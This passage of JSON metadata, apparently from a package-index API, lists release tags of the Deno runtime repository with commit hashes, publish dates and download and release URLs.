ts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.m